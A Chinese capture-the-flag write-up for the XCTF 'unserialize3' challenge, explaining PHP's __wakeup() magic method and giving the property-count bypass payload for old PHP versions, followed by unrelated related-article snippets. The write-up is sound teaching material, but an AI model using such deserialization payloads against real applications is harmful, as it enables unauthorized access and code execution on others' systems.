1.攻防世界 unserialize3(wakeup()魔术方法、反序列化工作原理)

进入题目页面如下

直接开审

<?php
// 定义一个名为 xctf 的类
class xctf {// 声明一个公共属性 $flag,初始值为字符串 '111'public $flag = '111';// 定义一个魔术方法 __wakeup()// 当对象被反序列化时,__wakeup() 方法会自动调用public function __wakeup() {// 终止脚本的执行,并输出字符串 'bad requests'exit('bad requests');}
}

__wakeup()方法在对象反序列化时会自动触发,但在这个方法中调用了exit()函数,会直接终止脚本执行并输出错误信息,这是一种防御机制,防止恶意的反序列化操作。

在 PHP 5.6.25 及更早版本、PHP 7.0.10 及更早版本中,如果对象属性的个数被声明得比实际多,__wakeup() 方法会被绕过。


__wakeup()魔术方法

PHP 中,__wakeup() 是一个重要的魔术方法,主要用于对象反序列化操作

__wakeup() 是 PHP 中的一个魔术方法,当使用 unserialize() 函数对序列化后的对象进行反序列化操作时,__wakeup() 方法会被自动调用。魔术方法是 PHP 预定义的、具有特殊名称和功能的方法,以双下划线 __ 开头,开发者可以在类中定义这些方法来实现特定的功能

当使用 unserialize() 函数将一个序列化的字符串反序列化为对象时,如果对象的类中定义了 __wakeup() 方法,该方法会在反序列化完成后自动被调用。通常用于重新建立对象在序列化过程中丢失的资源,例如重新连接数据库、初始化某些属性等

如果类中同时定义了 __unserialize()__wakeup() 方法,__unserialize() 会优先被调用,而 __wakeup() 将被忽略

__wakeup()方法工作机制

<?php
class Example {public $property = 'Initial Value';public function __wakeup() {echo "The __wakeup() method is called during unserialization.\n";// 可以在这里对对象的属性进行一些初始化或验证操作$this->property = 'Updated Value';}
}// 创建对象
$obj = new Example();
// 序列化对象
$serialized = serialize($obj);// 反序列化对象
$unserializedObj = unserialize($serialized);echo $unserializedObj->property; 
?>
  1. 定义了一个 Example 类,并在其中定义了 __wakeup() 方法。
  2. 创建 Example 类的对象 $obj 并进行序列化,得到序列化字符串 $serialized
  3. 使用 unserialize() 函数对 $serialized 进行反序列化操作,此时 __wakeup() 方法会自动被调用,在该方法中修改了对象的 $property 属性值。
  4. 最后输出反序列化后对象的 $property 属性值,显示为 Updated Value

在对象反序列化时,可能需要重新初始化一些资源,如数据库连接、文件句柄等。可以在 __wakeup() 方法中进行这些资源的初始化操作,确保对象在反序列化后能够正常使用这些资源。

class DatabaseConnection {private $connection;public function __wakeup() {// 重新建立数据库连接$this->connection = new mysqli('localhost', 'user', 'password', 'database');}
}
  • 在反序列化对象时,对对象的属性进行验证和清理,确保数据的合法性和安全性。检查属性值是否在合理范围内,对敏感信息进行加密等。

class User {public $age;public function __wakeup() {if ($this->age < 0 || $this->age > 120) {$this->age = 0; // 修正不合理的年龄值}}
}

在某些版本的 PHP 中(PHP 5.6.25 及更早版本、PHP 7.0.10 及更早版本),存在 __wakeup() 方法绕过漏洞。如果序列化字符串中表示对象属性个数的值被设置得比实际属性个数大,__wakeup() 方法将不会被调用。可以利用这个漏洞绕过 __wakeup() 方法中的安全检查或初始化逻辑,执行恶意操作。

class Vulnerable {public $secret = 'sensitive information';public function __wakeup() {if ($this->secret === 'malicious') {die('Unauthorized access');}}
}// 正常序列化
$obj = new Vulnerable();
$serialized = serialize($obj);// 构造绕过 __wakeup() 的序列化字符串
$bypassSerialized = str_replace('O:10:"Vulnerable":1:', 'O:10:"Vulnerable":2:', $serialized);// 反序列化绕过
$unserializedObj = unserialize($bypassSerialized);
echo $unserializedObj->secret; 

在上述代码中,通过修改序列化字符串中属性个数的值,绕过了 __wakeup() 方法的安全检查。


创建对象并序列化:首先创建 xctf 类的一个对象,然后对其进行序列化

<?php
class xctf {public $flag = '111';public function __wakeup() {exit('bad requests');}
}$obj = new xctf();
$serialized = serialize($obj);
echo $serialized;
?>

可以用下面这个在线工具运行上述代码

php在线运行,在线工具,在线编译IDE_w3cschool

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

 O:4:"xctf" 表示这是一个对象(O),类名是xctf,类名长度为4

1 表示对象有1个属性

s:4:"flag";s:3:"111"; 表示属性名为 flag(长度为 4),属性值为 111(长度为 3)

反序列化获取 flag,将修改后的序列化字符串作为code参数传递给反序列化代码

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

我们需要绕过 __wakeup()方法从而获得flag

通过构造一个序列化字符串,使得对象属性的声明个数大于实际个数,从而绕过 __wakeup()方法的执行

s:4:"flag";s:3:"111"; 表示属性名为 flag(长度为 4),属性值为 111(长度为 3)

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

最终得到flag

此绕过方法仅适用于 PHP 5.6.25 及更早版本、PHP 7.0.10 及更早版本。在更高版本中,该漏洞已被修复


反序列化

反序列化是指将序列化后的数据(如字节流、JSON、XML 等格式)转换回原始数据结构或对象状态的过程

反序列化的主要作用是将存储或传输中的数据恢复为原始的数据结构或对象,以便在程序中进一步使用

数据恢复:从文件、数据库中读取序列化后的数据并恢复为对象

网络通信:接收网络传输的字节流,并将其转换为本地可用的对象

缓存读取:从缓存中读取序列化的数据并反序列化

工作原理

读取序列化数据:从存储介质(如文件、数据库)或网络接收序列化后的数据。

解析数据格式:根据序列化时使用的格式(如 JSON、XML、字节流等),解析数据内容。

重建数据结构:根据解析结果,重新构造原始的数据结构或对象实例。

恢复对象状态:将解析后的数据赋值给对象的属性,恢复对象的原始状态。


PHP 的 unserialize() 函数用于将已序列化的字符串还原为 PHP 的值

用户可控输入:如果用户可以控制传入 unserialize() 的数据,可以通过构造恶意的序列化字符串来触发对象的魔术方法(如 __wakeup()__destruct() 等),从而执行任意代码。

魔术方法的利用:某些魔术方法(如 __wakeup()__destruct())在对象被反序列化或销毁时自动调用。如果这些方法中包含危险操作(如文件操作、命令执行等),可以利用这一点。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/69917.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python视频爬虫

文章目录 爬虫的基本步骤一些工具模拟浏览器并监听文件视频爬取易错点一个代码示例参考 爬虫的基本步骤 1.抓包分析&#xff0c;利用浏览器的开发者工具 2.发送请求 3.获取数据 4.解析数据 5.保存数据 一些工具 requests, 用于发送请求&#xff0c;可以通过get&#xff0c;p…

Excel 合并列数据

场景 要求每行数据的每个字段的内容不能以 [2,3,33,22] 形式展示 要求独立成列形式如下 代码 maven 依赖 <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactId><version>3.17</version></dependency>…

【vue3】实现pdf在线预览的几种方式

今天一天对当前可用的pdf预览插件做了测试&#xff0c;主要需求是只能预览不能下载&#xff0c;但对于前端来说&#xff0c;没有绝对的禁止&#xff0c;这里只罗列实现方式。 目前采用vue3版本为&#xff1a;3.2.37 iframevue-officepdfjs-dist iframe 先说最简单的&#xf…

腿足机器人之一- 机械与电子组件概览

腿足机器人之一机械与电子组件概览 引言机械组件骨架材料关节设计关节机械组件轴承&#xff08;ings&#xff09;连杆&#xff08;Linkages&#xff09;齿轮&#xff08;Gears&#xff09; 电气组件电机控制器传感器 四足机器人设计双足机器人设计波士顿Atlas机器人 引言 腿足…

重读《Java面试题,10万字208道Java经典面试题总结(附答案)》

最近重读了这篇文章&#xff0c;对很多概念模糊的地方加了拓展和补充。 目录 1、JDK 和 JRE 有什么区别&#xff1f; 2、 和 equals 的区别是什么&#xff1f; 3、final 在 java 中有什么作用&#xff1f; 4、java 中的 Math.round(-1.5) 等于多少&#xff1f; 5、String…

浏览器打开Axure RP模型

1&#xff0c;直接使用chrome打开&#xff0c;提示下载插件 2&#xff0c;需要做一些操作 打开原型文件&#xff0c;找到resources\chrome\axure-chrome-extension.crx文件&#xff0c;这就是我们需要的Chrome插件。 将axure-chrome-extension.crx文件后缀名改为axure-chrome…

优雅的git log输出内容更加醒目

执行命令 git config --global alias.lg "log --graph --prettyformat:%C(red)%h%C(reset) - %C(yellow)%d%C(reset) %C(magenta)<%an>%C(reset) %C(cyan)(%ad)%C(reset) %C(green)%s%C(reset) (%cr) --abbrev-commit --dateformat:%Y-%m-%d %H:%M:%S"

平面与平面相交算法杂谈

1.前言 空间平面方程&#xff1a; 空间两平面如果不平行&#xff0c;那么一定相交于一条空间直线&#xff0c; 空间平面求交有多种方法&#xff0c;本文进行相关讨论。 2.讨论 可以联立方程组求解&#xff0c;共有3个变量&#xff0c;2个方程&#xff0c;而所求直线有1个变量…

链表 —— 常用技巧与操作总结详解

引言 链表作为一种动态数据结构&#xff0c;以其灵活的内存管理和高效的插入删除操作&#xff0c;在算法与工程实践中占据重要地位。然而&#xff0c;链表的指针操作复杂&#xff0c;容易引发内存泄漏和野指针问题。本文博主将从基础操作到高阶技巧&#xff0c;系统化解析链表的…

【LLM】13:大模型算法面试题库

一、Transformer篇 1. Transformer的结构是什么 Transformer 由 编码器&#xff08;Encoder&#xff09; 和 解码器&#xff08;Decoder&#xff09; 两部分组成&#xff0c;两部分都包含目标嵌入层、位置编码、多头注意力层、前馈网络&#xff0c;且有残差连接和层归一化&am…

尚硅谷爬虫note003

一、函数 1. 函数的定义 def 函数名&#xff08;&#xff09;&#xff1a; 代码 2.函数的调用 函数名&#xff08;&#xff09; 3. 定义参数&#xff08;不调用函数不执行&#xff09; def sum&#xff08;a&#xff0c;b&#xff09; #形参 c a b print&#xff08;c&…

语言大模型基础概念 一(先了解听说过的名词都是什么)

SFT&#xff08;监督微调&#xff09;和RLHF&#xff08;基于人类反馈的强化学习&#xff09;的区别 STF&#xff08;Supervised Fine-Tuning&#xff09;和RLHF&#xff08;Reinforcement Learning from Human Feedback&#xff09;是两种不同的模型训练方法&#xff0c;分别…

Linux-文件基本操作

1.基本概念 文件: 一组相关数据的集合 文件名: 01.sh //文件名 2.linux下的文件类型 b block 块设备文件 eg: 硬盘 c character 字符设备文件 eg: 鼠标&#xff0c;键盘 d directory 目录文件 eg: 文件夹 - regular 常规文件…

【前端】 react项目使用bootstrap、useRef和useState之间的区别和应用

一、场景描述 我想写一个轮播图的程序&#xff0c;只是把bootstrap里面的轮播图拉过来就用上感觉不是很合适&#xff0c;然后我就想自己写自动轮播&#xff0c;因此&#xff0c;这篇文章里面只是自动轮播的部分&#xff0c;没有按键跟自动轮播的衔接部分。 Ps: 本文用的是函数…

react脚手架搭建react项目使用scss

1.create-react-app 创建的项目&#xff0c;webpack配置默认是隐藏的 &#xff0c;如果要查看 或修改用npm run eject命令,因为create-react-app脚手架默认已经配置了scss、sass所以不用改webpack配置。如果用less 就需要自己添加配置 2.如果直接使用scss的文件会直接报错&…

LabVIEW与USB设备开发

开发一台USB设备并使用LabVIEW进行上位机开发&#xff0c;涉及底层驱动的编写、USB通信协议的实现以及LabVIEW与设备的接口设计。本文将详细介绍如何开发USB设备驱动、实现LabVIEW与USB设备的通信以及优化数据传输&#xff0c;帮助用户顺利完成项目开发。下面是一个详细的说明&…

高通android WIFI debug

参考高通文档&#xff1a;80-76240-16_REV_AA_Wi-Fi_Debug_Techniques 大纲 一、 WLAN Debug Logs –logcat ■ Logcat log logcat is a command-line tool that dumps the log of system messages, ■ Including stack traces when the device throws an error. ■ Need t…

Golang轻松实现消息模板变量替换:text/template

text/template 是 Go 语言标准库中的一个包&#xff0c;用于生成文本输出。它通过解析模板并根据给定的数据执行模板来生成最终的文本。text/template 提供了强大的模板引擎&#xff0c;支持条件判断、循环、变量替换等功能。 基本概念 模板&#xff1a;模板是一个文本文件或…

蓝桥杯之并查集

算法思想 并查集是一种树形的数据结构&#xff0c;主要用于解决一些元素分组问题。用于处理一些不相交集合的合并以及查询问题。并查集的思想是用一个数组表示了整片森林&#xff0c;树的根节点唯一标识了一个集合&#xff0c;我们只要找到了某个元素的树根&#xff0c;就能确…

list_for_each_entry_safe 简介

list_for_each_entry_safe 是 Linux 内核中用于遍历链表的一个宏&#xff0c;特别适用于在遍历过程中可能需要删除链表节点的场景。它的设计保证了在删除当前节点时&#xff0c;不会影响后续节点的访问&#xff0c;从而实现安全的遍历。 定义 #define list_for_each_entry_sa…